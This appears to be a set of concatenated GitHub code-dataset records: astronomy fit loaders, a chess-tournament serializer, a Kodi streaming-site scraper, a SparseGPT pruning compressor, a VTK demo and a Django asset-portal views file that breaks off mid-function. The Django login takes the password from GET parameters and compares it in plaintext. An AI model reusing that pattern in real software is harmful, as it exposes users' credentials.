The load-in functions are found in BaroloAnalyis/BaroloModelAnalysis.py\n BaroloFit=AnalysisFncs['BaroloFnc']['LoadBaroloModel'](ObjDict,FolderDict,FittingOptions['BaroloAnalysisFolders'][FitStep],FittingOptions['BaroloLabels'][FitStep])\n # It is possible that the Barolo fit failed, and the load-in function returned the bad-fit dictionary. If it didn't fail (indicated by the FitAchieved flag) there are a few more things to do\n if BaroloFit['FITAchieved']:\n # Barolo gives the center in pixels, and some plots and calculations need this to be in RA and DEC, so get those values here.\n BaroloFit['RA'],BaroloFit['DEC']=AnalysisFncs['AstroFncs']['CalcRA_Dec_FromCube'](BaroloFit['XCENTER'],BaroloFit['YCENTER'],CubeInfo)\n # If the fit was successful, compare an MCG realization of the parameters to the data cube\n BaroloFit=AnalysisFncs['ModelCompFncs']['CompareGeneralTiltedRingModel'](BaroloFit,CubeInfo,AnalysisFncs['MCGFncs'])\n # Return the BaroloFit tilted-ring dictionary.\n return BaroloFit\n \ndef GetFATFits(ObjDict,FolderDict,AnalysisFncs,FittingOptions,CubeInfo,FitStep):\n \"\"\"\n This dictionary loads in a FAT fit as a pair of tilted ring dictionaries\n \"\"\"\n\n # Start by making a 2 element empty list to store the pair of dictionaries\n FATFit=[None]*2\n # Load in the FAT fit for the galaxy indicated by the ObjDict, using the particular fit that was run with the options set in the particular field (see ReleaseConfigurationOptions/). The load-in functions are found in FATAnalyis/FATModelAnalysis.py\n FATFit[0],FATFit[1]=AnalysisFncs['FATFnc']['LoadFATModel'](ObjDict,FolderDict,FittingOptions['FATAnalysisFolders'][FitStep],FittingOptions['FATLabels'][FitStep])\n # It is possible that the FAT fit failed, and the load-in function returned the bad-fit dictionary. 
If it didn't fail (indicated by the FitAchieved flag) there are a few more things to do\n # Loop through both dictionaries\n for j in range(2):\n if FATFit[j]['FITAchieved']:\n # FAT returns the centroid in RA and DEC, which need to be converted to pixel X and Y values for some comparisons.\n FATFit[j]['XCENTER'],FATFit[j]['YCENTER']=AnalysisFncs['AstroFncs']['CalcCenter_FromCube'](FATFit[j]['RA'],FATFit[j]['DEC'],CubeInfo)\n # If the fit is successful, compare an MCG realization of the parameters to the data cube\n FATFit[j]=AnalysisFncs['ModelCompFncs']['CompareGeneralTiltedRingModel'](FATFit[j],CubeInfo,AnalysisFncs['MCGFncs'])\n # Return the pair of FAT Tilted Ring dictionaries.\n return FATFit\n","repo_name":"CIRADA-Tools/WKAPP","sub_path":"FitComparisons/CompareFits.py","file_name":"CompareFits.py","file_ext":"py","file_size_in_byte":6392,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"33"} +{"seq_id":"13810256259","text":"import copy\r\nfrom modeles.joueur import Joueur\r\nfrom modeles.tournoi import Tournoi\r\nfrom modeles.match import Match\r\nfrom modeles.tour import Tour\r\n\r\nclass Database:\r\n\r\n def serialize_player(self,joueur):\r\n \"\"\" serialize un joueur \"\"\"\r\n serialized_player = {\r\n 'nom': joueur.nom,\r\n 'prenom': joueur.prenom,\r\n 'birthday': joueur.birthday,\r\n 'sexe': joueur.sexe,\r\n 'classement': joueur.classement,\r\n 'total_points': joueur.total_points\r\n }\r\n return serialized_player\r\n\r\n\r\n def serialize_match(self,match):\r\n \"\"\" serialize un match \"\"\"\r\n serialized_match = {\r\n 'joueur1': self.serialize_player(match.joueur1[0]),\r\n 'score1': match.joueur1[1],\r\n 'joueur2': self.serialize_player(match.joueur2[0]),\r\n 'score2': match.joueur2[1]\r\n }\r\n return serialized_match\r\n\r\n\r\n def serialize_tour(self,tour):\r\n \"\"\" serialize un tour \"\"\"\r\n serialized_matchs = []\r\n for match in tour.matchs:\r\n serialized_match = self.serialize_match(match)\r\n serialized_matchs.append(serialized_match)\r\n serialized_tour = {\r\n 'nom': tour.nom,\r\n 'date_debut': tour.date_debut,\r\n 'heure_debut': tour.heure_debut,\r\n 'date_fin': tour.heure_debut,\r\n 'heure_fin': tour.heure_fin,\r\n 'matchs': serialized_matchs\r\n }\r\n return serialized_tour\r\n\r\n\r\n def db_save_championnat(self, db, championnat):\r\n \"\"\" sauvegarde championnat dans base de donnees \"\"\"\r\n players_table = db.table('players')\r\n players_table.truncate()\r\n for joueur in championnat:\r\n serialized_player = self.serialize_player(joueur)\r\n players_table.insert(serialized_player)\r\n\r\n return db\r\n\r\n\r\n def db_load_championnat(self, db):\r\n \"\"\" retourne championnat a partir de base de donnees \"\"\"\r\n serialized_players = db.table('players').all()\r\n championnat = []\r\n for player in serialized_players:\r\n joueur = Joueur(player['nom'], player['prenom'], player['birthday'], player['sexe'], player['classement'])\r\n championnat.append(joueur)\r\n return championnat\r\n\r\n\r\n def db_save_tournois(self, db, tournois):\r\n \"\"\" sauvegarde championnat dans base de donnees \"\"\"\r\n tournois_table = db.table('tournois')\r\n tournois_table.truncate()\r\n for tournoi in tournois:\r\n serialized_players = []\r\n for joueur in tournoi.joueurs:\r\n serialized_player = self.serialize_player(joueur)\r\n serialized_players.append(serialized_player)\r\n serialized_tours = []\r\n for tour in tournoi.tours:\r\n serialized_tour = self.serialize_tour(tour)\r\n 
serialized_tours.append(serialized_tour)\r\n serialized_tournoi = {\r\n 'nom': tournoi.nom,\r\n 'lieu': tournoi.lieu,\r\n 'date': tournoi.date,\r\n 'description': tournoi.description,\r\n 'joueurs': serialized_players,\r\n 'tours': serialized_tours\r\n }\r\n tournois_table.insert(serialized_tournoi)\r\n\r\n return db\r\n\r\n\r\n def db_load_tournois(self, db):\r\n \"\"\" retourne liste tournois a partir de base de donnees \"\"\"\r\n serialized_tournois = db.table('tournois').all()\r\n deserialized_tournois = []\r\n for tournoi in serialized_tournois:\r\n deserialized_joueurs = [] # remise a zero liste joueurs tournoi\r\n # deserialization de chaque joueur du tournoi\r\n for joueur in tournoi['joueurs']:\r\n deserialized_joueur = Joueur(joueur['nom'], joueur['prenom'],\r\n joueur['birthday'], joueur['sexe'], joueur['classement'])\r\n deserialized_joueur.total_points = joueur['total_points']\r\n deserialized_joueurs.append(deserialized_joueur)\r\n # creation instance Tournoi\r\n deserialized_tournoi = Tournoi(tournoi['nom'], tournoi['lieu'], tournoi['date'],\r\n tournoi['description'], deserialized_joueurs)\r\n # deserialization tours du tournoi\r\n for tour_serialized in tournoi['tours']:\r\n tour = Tour(tour_serialized['nom'], tour_serialized['date_debut'], tour_serialized['heure_debut'],\r\n tour_serialized['date_fin'], tour_serialized['heure_fin'])\r\n for match_serialized in tour_serialized['matchs']:\r\n joueur1_serialized = match_serialized['joueur1']\r\n joueur2_serialized = match_serialized['joueur2']\r\n joueur1 = Joueur(joueur1_serialized['nom'], joueur1_serialized['prenom'],\r\n joueur1_serialized['birthday'], joueur1_serialized['sexe'],\r\n joueur1_serialized['classement'])\r\n joueur2 = Joueur(joueur2_serialized['nom'], joueur2_serialized['prenom'],\r\n joueur2_serialized['birthday'], joueur2_serialized['sexe'],\r\n joueur2_serialized['classement'])\r\n match = Match(joueur1, match_serialized['score1'], joueur2, match_serialized['score2'])\r\n tour.matchs.append(match)\r\n # ajout tour deserialized a l'instance Tournoi\r\n deserialized_tournoi.tours.append(tour)\r\n # ajout tournoi deserialized a la liste des tournois\r\n deserialized_tournois.append(deserialized_tournoi)\r\n return deserialized_tournois\r\n\r\n\r\n def save_tournoi(self, tournoi):\r\n \"\"\" retourne tournoi avec copie des instances de joueurs \"\"\"\r\n copy_joueurs = []\r\n for joueur in tournoi.joueurs:\r\n copy_joueur = copy.deepcopy(joueur)\r\n copy_joueurs.append(copy_joueur)\r\n tournoi.joueurs = copy_joueurs\r\n return tournoi","repo_name":"LeoCapou/OC_Projet4","sub_path":"controleurs/gestion_bdd.py","file_name":"gestion_bdd.py","file_ext":"py","file_size_in_byte":6189,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"29333086953","text":"from django.urls import path\n\nfrom companies import views\n\napp_name = \"companies\"\n\nurlpatterns = [\n path(\"list/\", views.list_company, name=\"list_company\"),\n path(\"search/list/\", views.search_list_company, name=\"search_list_company\"),\n path(\"list/create/\", views.create_company, name=\"create_company\"),\n path(\"list//update/\", views.update_company, name=\"update_company\"),\n path(\"list//\", views.detail_company, name=\"detail_company\"),\n path(\"list//delete/\", views.delete_company, name=\"delete_company\"),\n path(\"csv/company/\", views.csv_company, 
name=\"csv_company\"),\n]\n","repo_name":"jorgeav527/rpg_labs_repo","sub_path":"app/companies/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"33"} +{"seq_id":"26887887536","text":"import scraper\nimport re\nimport urllib\nimport urllib2\nimport urlparse\nimport xbmcaddon\nimport xbmc\nfrom salts_lib.db_utils import DB_Connection\nfrom salts_lib import log_utils\nfrom salts_lib.constants import VIDEO_TYPES\nfrom salts_lib.constants import QUALITIES\nfrom salts_lib.constants import USER_AGENT\n\nBASE_URL = 'http://superchillin.com'\n\nclass NoobRoom_Scraper(scraper.Scraper):\n base_url=BASE_URL\n def __init__(self, timeout=scraper.DEFAULT_TIMEOUT):\n self.timeout=timeout\n self.db_connection = DB_Connection()\n self.base_url = xbmcaddon.Addon().getSetting('%s-base_url' % (self.get_name()))\n self.username = xbmcaddon.Addon().getSetting('%s-username' % (self.get_name()))\n self.password = xbmcaddon.Addon().getSetting('%s-password' % (self.get_name()))\n self.include_paid = xbmcaddon.Addon().getSetting('%s-include_premium' % (self.get_name())) == 'true'\n \n @classmethod\n def provides(cls):\n return frozenset([VIDEO_TYPES.TVSHOW, VIDEO_TYPES.SEASON, VIDEO_TYPES.EPISODE, VIDEO_TYPES.MOVIE])\n \n @classmethod\n def get_name(cls):\n return 'NoobRoom'\n \n def resolve_link(self, link):\n url = urlparse.urljoin(self.base_url, link)\n html = self._http_get(url, cache_limit=.5)\n match = re.search('\"file\"\\s*:\\s*\"([^\"]+)', html)\n if match:\n file_link = match.group(1)\n stream_url = urlparse.urljoin(self.base_url, file_link)\n self._set_cookies(self.base_url, {})\n request = urllib2.Request(stream_url)\n request.add_header('User-Agent', USER_AGENT)\n request.add_unredirected_header('Host', request.get_host())\n request.add_unredirected_header('Referer', url)\n response = urllib2.urlopen(request)\n return response.geturl()\n \n def format_source_label(self, item):\n label='[%s] (%s) %s (%s/100) ' % (item['quality'], item['res'], item['host'], item['rating'])\n return label\n \n def get_sources(self, video):\n source_url=self.get_url(video)\n hosters = []\n if source_url:\n url = urlparse.urljoin(self.base_url, source_url)\n html = self._http_get(url, cache_limit=.5)\n \n has_1080p=False\n match = re.search('Watch in 1080p', html)\n if match:\n has_1080p=True\n \n if video.video_type == VIDEO_TYPES.MOVIE:\n quality = QUALITIES.HD\n else:\n quality = QUALITIES.HIGH\n \n for match in re.finditer(\"class='hoverz'.*?href='([^']+)'>([^<]+)\\s+\\(([^)]+).*?>(\\d+)%\", html, re.DOTALL):\n url, host, status, load = match.groups()\n if not self.include_paid and status.upper()=='PAID':\n continue\n \n url = url.replace('&', '&')\n host = '%s (%s)' % (host, status)\n hoster = {'multi-part': False, 'host': host, 'class': self, 'url': url, 'quality': quality, 'views': None, 'rating': 100 - int(load), 'direct': True, 'res': '720p'}\n if quality== QUALITIES.HD:\n hoster['res']='720p'\n else:\n hoster['res']='480p'\n hosters.append(hoster)\n \n if self.include_paid and has_1080p:\n url += '&hd=1'\n hoster = {'multi-part': False, 'host': host, 'class': self, 'url': url, 'quality': QUALITIES.HD, 'views': None, 'rating': 100 - int(load), 'direct': True, 'res': '1080p'}\n hosters.append(hoster)\n return hosters\n\n def get_url(self, video):\n return super(NoobRoom_Scraper, self)._default_get_url(video)\n \n def _get_episode_url(self, show_url, video):\n episode_pattern = 
\"%sx%02d\\s*-\\s*.*?href='([^']+)\" % (video.season, int(video.episode))\n title_pattern=\"\\d+x\\d+\\s*-\\s*.*?href='([^']+)'>([^<]+)\"\n return super(NoobRoom_Scraper, self)._default_get_episode_url(show_url, video, episode_pattern, title_pattern)\n \n def search(self, video_type, title, year):\n if not self.include_paid and video_type != VIDEO_TYPES.MOVIE: return []\n search_url = urlparse.urljoin(self.base_url, '/search.php?q=')\n search_url += urllib.quote_plus(title)\n html = self._http_get(search_url, cache_limit=.25)\n results=[]\n if video_type == VIDEO_TYPES.MOVIE:\n pattern = '\\s*Movies\\s*(.*)'\n else:\n pattern = '\\s*TV Series\\s*(.*)'\n\n match = re.search(pattern, html)\n if match:\n container = match.group(1)\n pattern = \"href='([^']+)'>([^<]+)\\s*
\\s*(?:\\((\\d{4})\\))?\"\n for match in re.finditer(pattern, container):\n url, match_title, match_year = match.groups('')\n if not year or not match_year or year == match_year:\n result = {'url': url, 'title': match_title, 'year': match_year}\n results.append(result)\n \n return results\n \n @classmethod\n def get_settings(cls):\n settings = super(NoobRoom_Scraper, cls).get_settings()\n name=cls.get_name()\n settings.append(' ' % (name))\n settings.append(' ' % (name))\n settings.append(' ' % (name))\n return settings\n \n def _http_get(self, url, data=None, cache_limit=8):\n # return all uncached blank pages if no user or pass\n if not self.username or not self.password:\n return ''\n \n html=super(NoobRoom_Scraper, self)._cached_http_get(url, self.base_url, self.timeout, data=data, cache_limit=cache_limit)\n if not re.search('href=\"logout.php\"', html):\n log_utils.log('Logging in for url (%s)' % (url), xbmc.LOGDEBUG)\n self.__login()\n html=super(NoobRoom_Scraper, self)._cached_http_get(url, self.base_url, self.timeout, data=data, cache_limit=0)\n \n return html\n\n def __login(self):\n url = urlparse.urljoin(self.base_url, '/login2.php')\n data = {'email': self.username, 'password': self.password}\n html = super(NoobRoom_Scraper, self)._cached_http_get(url, self.base_url, self.timeout, data=data, cache_limit=0)\n if not re.search('href=\"logout.php\"', html):\n raise Exception('noobroom login failed')\n","repo_name":"trickaz/tknorris-beta-repo","sub_path":"plugin.video.salts/scrapers/noobroom_scraper.py","file_name":"noobroom_scraper.py","file_ext":"py","file_size_in_byte":6785,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"16371797911","text":"import torch\nimport torch.nn as nn\n\nfrom mmrazor.utils import print_log\nfrom .ops import SparseGptConv2d, SparseGptLinear, SparseGptMixIn\nfrom .utils import replace_with_dynamic_ops\n\n\ndef to_static_model(model: nn.Module):\n \"\"\"Replace dynamicops with torch modules.\"\"\"\n from mmrazor.structures.subnet.fix_subnet import (export_fix_subnet,\n load_fix_subnet)\n fix_subnet = export_fix_subnet(model)[0]\n load_fix_subnet(model, fix_subnet)\n return model\n\n\nclass SparseGptCompressor():\n \"\"\"The compressor with SparseGPT.\"\"\"\n\n def __init__(self) -> None:\n self.model: nn.Module = None\n\n def prepare(self,\n model: nn.Module,\n prune_conv=True,\n prune_linear=True) -> None:\n \"\"\"Prepare for compressing model.\"\"\"\n self.model = model\n prune_modules: dict = {}\n if prune_conv:\n prune_modules[nn.Conv2d] = SparseGptConv2d\n if prune_linear:\n prune_modules[nn.Linear] = SparseGptLinear\n replace_with_dynamic_ops(model, prune_modules)\n\n @classmethod\n def to_static_model(cls, model):\n \"\"\"Convert replaced op with the original torch model.\"\"\"\n return to_static_model(model)\n\n # hessian\n\n def register_hessian_hooks(self):\n \"\"\"Register updating hessian hooks for specified ops.\"\"\"\n for module in self.sparse_ops:\n module.register_hessian_hook()\n\n def remove_hessian_hooks(self):\n \"\"\"Remove updating hessian hooks for specified ops.\"\"\"\n for module in self.sparse_ops:\n module.remove_hessian_hook()\n\n def init_hessian(self, device=None):\n \"\"\"Init hessian.\"\"\"\n for op in self.sparse_ops:\n op.init_hessian(device=device)\n\n # prune\n def prune(self,\n sparsity,\n prunen=0,\n prunem=0,\n blocksize=128,\n percdamp=.01,\n device=torch.device('cuda')):\n \"\"\"Apply the compression algorithm to the model.\"\"\"\n for name, module in 
self.named_sparse_ops:\n try:\n original_device = next(module.parameters()).device\n module: SparseGptMixIn = module.to(device)\n error = module.prune(\n sparsity=sparsity,\n prunen=prunen,\n prunem=prunem,\n blocksize=blocksize,\n percdamp=percdamp,\n )\n print_log(f'prune {name} success \\t error = {error}')\n module.to(original_device)\n torch.cuda.empty_cache()\n except Exception as e:\n print_log(f'prune {name} failed as {e}')\n\n def prune_24(self, device=torch.device('cuda:0')):\n \"\"\"Apply the compression algorithm to the model with the specified\n setting.\"\"\"\n self.prune(0.5, prunen=2, prunem=4, device=device)\n\n # ops\n\n @property\n def sparse_ops(self):\n \"\"\"The ops to be applied the algorithm.\"\"\"\n assert self.model is not None\n for module in self.model.modules():\n if isinstance(module, SparseGptMixIn):\n yield module\n\n @property\n def named_sparse_ops(self):\n \"\"\"The named ops to be applied the algorithm.\"\"\"\n for name, module in self.model.named_modules():\n if isinstance(module, SparseGptMixIn):\n yield name, module\n","repo_name":"open-mmlab/mmrazor","sub_path":"mmrazor/implementations/pruning/sparse_gpt/compressor.py","file_name":"compressor.py","file_ext":"py","file_size_in_byte":3470,"program_lang":"python","lang":"en","doc_type":"code","stars":1223,"dataset":"github-code","pt":"33"} +{"seq_id":"74294895454","text":"import vtk\n\ndef make_actor(polydata):\n \n mapper = vtk.vtkPolyDataMapper()\n mapper.SetInputData(polydata)\n actor = vtk.vtkActor()\n actor.SetMapper(mapper)\n\n return actor\n\norigin = [0,0,0]\np0 = [1,0,0]\np1 = [0,1,0]\np2 = [0,1,2]\np3 = [1,2,3]\n\npoints = vtk.vtkPoints()\npoints.InsertNextPoint(origin)\npoints.InsertNextPoint(p0)\npoints.InsertNextPoint(p1)\npoints.InsertNextPoint(p2)\npoints.InsertNextPoint(p3)\n\nlines = vtk.vtkCellArray()\n\nfor i in range(3):\n line = vtk.vtkLine()\n line.GetPointIds().SetId(0,i)\n line.GetPointIds().SetId(1, i+1)\n lines.InsertNextCell(line)\n\n \nlinesPolydata = vtk.vtkPolyData()\nlinesPolydata.SetPoints(points)\nlinesPolydata.SetLines(lines)\n\nactor = make_actor(linesPolydata)\nrenderer = vtk.vtkRenderer()\nrenderer.AddActor(actor)\nrenderWindow = vtk.vtkRenderWindow()\nrenderWindow.AddRenderer(renderer)\nrenderWindow.SetSize(1000, 1000)\nrenderWindowInteractor = vtk.vtkRenderWindowInteractor()\nrenderWindowInteractor.SetRenderWindow(renderWindow)\nrenderWindow.Render()\nrenderWindowInteractor.Start()\n\n","repo_name":"EunbyeolCho/study_VTK","sub_path":"tutorial/longLine.py","file_name":"longLine.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"4621165056","text":"import os\nfrom tqdm import tqdm\nimport sys\nimport pandas as pd\ndef make_txt_from(dir_to_tsv, txts_destination_dir):\n #all_files = os.listdir(dir_to_tsv)\n #text_index_file = [i for i in all_files if '.tsv' in i]\n #assertEqual(len(text_index_file), 1)\n text_index_file = os.path.join(dir_to_tsv, 'line_index.tsv')\n file_tsv_df = pd.read_csv(text_index_file, delimiter='\\t', header=None)\n for index, file in tqdm(enumerate(file_tsv_df[0])):\n \ttxt_file = str(file)+'.txt'\n\n \twith open(os.path.join(txts_destination_dir, txt_file), 'w+') as f:\n f.write(str(file_tsv_df[1][index]))\n\nif __name__ == \"__main__\":\n dir_to_tsv = sys.argv[1] #directory to line_index.tsv\n txts_destination_dir = sys.argv[2] #destinationn directory\n make_txt_from(dir_to_tsv, 
txts_destination_dir)\n","repo_name":"Open-Speech-EkStep/common_scripts","sub_path":"misc/make_txt_files_openslr.py","file_name":"make_txt_files_openslr.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"33"} +{"seq_id":"1385592884","text":"from typing import List\n\nimport numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import cross_val_score\n\nfrom metadatabase import MetaDataBase\nfrom metalearners.base_agnostic_learner import BaseAgnosticLearner\nfrom utilities import TimeoutException, time_limit\n\n\nclass AverageRegretLearner(BaseAgnosticLearner):\n def __init__(self, verbosity: int = 1):\n \"\"\"Initialize the dataset-agnostic average regret meta-learner. The method computes the average regret\n for all pipelines in the metadataset in the offline phase, and ranks approaches accordingly.\n In the online phase the best-ranked pipelines, with at least a specified amount of evaluations can be recommended.\n It deos not tailor the online phase to the dataset at hand, making it a dataset-agnostic method.\n\n Arguments\n ---------\n verbosity: int,\n Set to 1 or larger to get feedback. If smaller no progress is shown.\n \"\"\"\n super().__init__()\n self._verbosity = verbosity\n\n def offline_phase(self, mdbase: MetaDataBase, metric: str = \"neg_log_loss\", higher_is_better: bool = True) -> None:\n \"\"\"Performs offline computation (e.g. average rank computation) using the specified metadatabase.\n Stores average normalized regret per pipeline, on on how many evaluations this is based.\n\n Arguments\n ---------\n mdbase: MetaDataBase,\n metadatabase of prior experiences, as created in metadatabase.MetaDataBase class.\n metric: string,\n the metric by which the ranking is created from the metadataset.\n higher_is_better: boolean,\n whether or not a higher value of `metric `is better, needed to compute utility.\n \"\"\"\n self._mdbase = mdbase\n\n # first process all of the scores such that they are normalized regret between 0 and 1, with 0 being best.\n pipelines_to_ranking_scores = {}\n for pipe_id in mdbase.list_pipelines(by=\"id\"):\n pipelines_to_ranking_scores[pipe_id] = []\n for did in mdbase.list_datasets(by=\"id\"):\n did_df = mdbase.get_df(datasets=[did], metrics=[metric])\n max_score = max(did_df[\"score\"])\n min_score = min(did_df[\"score\"])\n for entry in did_df.iterrows():\n row_values = entry[1]\n pipe_id = int(row_values[1])\n raw_score = float(row_values[2])\n ranking_score = abs(max_score - raw_score) / abs(min_score - max_score) # normalized distance to highest result for this dataset\n if higher_is_better:\n ranking_score = 1 - ranking_score # if higher metric is better, then a lower ranking_score is better (cuz min distance to highest score)\n pipelines_to_ranking_scores[pipe_id].extend([ranking_score])\n\n self._pipeline_avgrank = {}\n self._pipeline_avgrank_counts = {}\n for pipe_key, ranking_list in zip(pipelines_to_ranking_scores.keys(), pipelines_to_ranking_scores.values()):\n ranking_score = 0 # 0 is good initialization, because score is non-negative\n if len(ranking_list) != 0:\n ranking_score = sum(ranking_list) / len(ranking_list)\n self._pipeline_avgrank[pipe_key] = ranking_score\n self._pipeline_avgrank_counts[pipe_key] = len(ranking_list)\n\n def online_phase(\n self,\n X: pd.DataFrame,\n y: pd.DataFrame,\n max_time: int,\n evaluate_recommendations: bool = False,\n metric: str = \"neg_log_loss\",\n n_jobs: int = 1,\n total_n_configs: int = 25,\n 
min_evals: int = 10,\n ) -> None:\n \"\"\"Execute the meta-learning strategy, i.e. recommend the pipelines from the average ranking. But at most `total_n_configs`.\n Note: avoid passing a dataset (`X`,`y`) which is also in `offline_phase()`'s metadatabase `mdbase`\n\n Arguments\n ---------\n X: pd.DataFrame,\n Features that are used during pipeline training and possible characterization and similarity methods.\n y: pd.Series,\n Targets that are used during pipeline training and possible characterization and similarity methods.\n max_time: int,\n The amount of time the online phase is allowed to take. Additionally, when evaluating the method,\n the evaluation method such as LOOCV should take care of time keeping as well.\n This parameter is provided because we allow meta-learners altering their behavior accordingly.\n evaluate_recommendations: boolean,\n whether or not the pipeline is evaluated on (X,y) before including it (in `self._top_configurations`).\n If the pipeline are evaluated, then they are ordered by their rank in `self._top_configurations`.\n metric: str,\n metrics/scoring on which configurations are assessed\n n_jobs: int,\n the `n_jobs` the online phase can use in its computations, especially important for meta-learners\n that evaluate models because they could evaluate a lot more or less depending on this value.\n total_n_configs: integer,\n specifies the number of configurations that should be stored in self._top_configurations\n (ordered high-to-low by estimated performance)\n min_evals: integer,\n the minimal number of evaluations a pipe should have before its average regret is considered for the recommendation of pipelines.\n \"\"\"\n\n # compute which pipes should be recommended\n pipes_with_min_evals = [pipe for pipe in self._pipeline_avgrank_counts if self._pipeline_avgrank_counts[pipe] >= min_evals]\n pipe_rankingscores_min_evals = {pipe: ranking_score for pipe, ranking_score in self._pipeline_avgrank.items() if pipe in pipes_with_min_evals}\n pipe_ranking = sorted(pipe_rankingscores_min_evals, key=lambda x: pipe_rankingscores_min_evals[x], reverse=True)\n pipes_to_recommend = pipe_ranking[:total_n_configs]\n\n # store recommendations\n try:\n with time_limit(max_time):\n for pipe_id in pipes_to_recommend:\n pipe = self._mdbase.get_sklearn_pipeline(pipe_id, X, y, True, True)\n # Must expect not all pipelines may work, e.g. 
feature selectors may remove all features\n # therefore try fitting pipe, if it does not work do not consider it, fill it in with while loop later\n if evaluate_recommendations:\n try:\n score = float(np.mean(cross_val_score(pipe, X, y, cv=n_jobs, scoring=metric, n_jobs=n_jobs)))\n self.add_configuration(pipe, score, higher_is_better=True)\n except ValueError as e:\n if self._verbosity >= 1:\n print(\"pipeline with id {} failed to fit, do not consider it\".format(pipe_id))\n else:\n score = None # did not evaluate\n self.add_configuration(pipe, score, higher_is_better=True)\n\n except TimeoutException as e:\n if self._verbosity >= 1:\n print(\"online_phase timed out with {} seconds\".format(max_time))\n","repo_name":"leightonvg/mlta","sub_path":"metalearners/average_regret_learner.py","file_name":"average_regret_learner.py","file_ext":"py","file_size_in_byte":7328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"20012342030","text":"from django.http import HttpResponse\nfrom django.shortcuts import render\nfrom django.http import HttpResponseRedirect \nfrom portal.models import Host\nfrom portal.models import Idc\nfrom portal.models import Isp\nfrom portal.models import User\nfrom portal.models import Maintance\nfrom django.http import JsonResponse\nimport time\n\ndef timestamo_datetime(value):\n\tformat = '%Y-%m-%d %H:%M'\n\t#value为传入的时间戳\n\tvalue = time.localtime(value)\n\tdt = time.strftime(format,value)\n\treturn dt\n\n# Create your views here.\nindexURL='http://192.168.100.101:8080/'\ndef login(request):\n\treturn render(request,'portal/login.html')\ndef check_login(request):\n\tusername = request.GET.get('username')\n\t#username = request.GET.get('u')\n\tpasswd = request.GET.get('password')\n\t#查询数据库\n\tpwd = User.objects.get(name__exact=username)\n\tif pwd.pwd == passwd:\n\t\treturn HttpResponseRedirect('/')\n\t\t#return render(request,'portal/index.html')\n\telse:\n\t\t#return HttpResponse('用户名或密码错误')\n\t\t#return HttpResponse('

用户名或密码错误

')\n\t\treturn render(request,'portal/login.html')\ndef addHost(request):\n\treturn render(request,'portal/addHost.html')\ndef addIdc(request):\n\treturn render(request,'portal/addIdc.html')\ndef addMaintance(request):\n\treturn render(request,'portal/addMaintance.html')\ndef saltCMD(request):\n\treturn render(request,'portal/saltCMD.html')\ndef get_hosts(request):\n\t#id=request.GET['id']\n\thosts=Host.objects.all()[:10]\t\n\treturn render(request,'portal/hosts.html',{'hosts':hosts})\ndef idc_lists(request):\n\tidcs_list=Idc.objects.all()[:10]\n\treturn HttpResponse('

测试IDC机房列表

')\n\t#return render(request,'portal/idcs.html')\n#首页\ndef index(request):\n\tresponse = \"\"\n\thosts_list=Host.objects.all()[:10]\n\tidcs_list=Idc.objects.all()[:10]\n\tisps_list=Isp.objects.all()[:10]\n\tmaintances_list=Maintance.objects.all()[:10]\n\tunhosts_list=Host.objects.filter(status='0')[:10]\n\treturn render(request,'index.html',{'hosts':hosts_list,'idcs':idcs_list,'isps':isps_list,'maintances':maintances_list,'unhosts_list':unhosts_list})\n#获取IP地址\ndef ip_address(request):\n\treturn {'ip_address': request.META['REMOTE_ADDR']}\n#搜索框搜索\ndef search(request):\n\thost = request.GET.get('host')\n\tidc = request.GET.get('idc')\n\thosts_array=Host.objects.filter(name__icontains='%s' % host)[:10]\n\tidcs_array=Host.objects.filter(name__icontains='%s' % idc)[:10]\n\thosts_info=\"\"\n\tfor i in hosts_array:\n\t\thosts_info += \"\"+str(i.id)+\"\"+i.name+\"\"+i.ip+\"\"+str(i.role)+\"\"+str(i.rack)+\"\"\n\treturn HttpResponse(\"\"+hosts_info+\"\")\n#检查提交是否正确,包括设备机房维护等所有的\ndef check_action(request):\n\t#不接收GET请求\n\tif request.method == 'GET':\n\t\treturn HttpResponse(status=403)\n\t#根据iname判断表单是什么表单\t\n\tif request.POST[\"iname\"] == \"add-idc\":\n\t\tcity=request.POST[\"idc-city\"].encode('utf8')\n\t\tprovince=request.POST[\"idc-province\"].encode('utf8')\n\t\tisp=request.POST[\"idc-isp\"].encode('utf8')\n\t\tcompany=request.POST[\"idc-company\"].encode('utf8')\n\t\tiname=request.POST[\"iname\"].encode('utf8')\n\t\t\n\t\t#数据库保存数据\n\t\ti1 = Idc(city=city,isp=isp,province=province,company=company)\n\t\ti1.save()\n\t\treturn render(request,'portal/formRes.html')\n\telif request.POST[\"iname\"] == \"add-isp\":\n\t\tname=request.POST[\"isp-name\"].encode('utf8')\n\t\tcontact=request.POST[\"isp-contact\"].encode('utf8')\n\t\tphone=request.POST[\"isp-phone\"].encode('utf8')\n\t\tinfo=request.POST[\"isp-info\"].encode('utf8')\n\t\taddress=request.POST[\"isp-address\"].encode('utf8')\n\t\t#数据库保存数据\n\t\ts1 = Isp(name=name,contact=contact,phone=phone,info=info,address=address)\n\t\ts1.save()\n\t\treturn render(request,'portal/formRes.html')\n\telif request.POST[\"iname\"] == \"add-host\":\n\t\tname=request.POST[\"host-name\"].encode('utf8')\n\t\tip=request.POST[\"host-ip\"].encode('utf8')\n\t\tcontact=request.POST[\"host-contact\"].encode('utf8')\n\t\tmodelNum=request.POST[\"host-modNum\"].encode('utf8')\n\t\trole=request.POST[\"host-role\"].encode('utf8')\n\t\th1 = Host(name=name,ip=ip,role=role,modelNum=modelNum)\n\t\th1.save()\n\t\treturn render(request,'portal/formRes.html')\t\n\telif request.POST[\"iname\"] == \"add-maintance\":\n\t\tiname=request.POST[\"iname\"].encode('utf8')\n\t\tip=request.POST[\"ip\"]\n\t\tinfo=request.POST[\"info\"].encode('utf8')\n\t\treturn HttpResponse(iname)\n\telif request.POST[\"iname\"] == \"init-host\":\n newName=request.POST[\"name\"].encode('utf8')\n 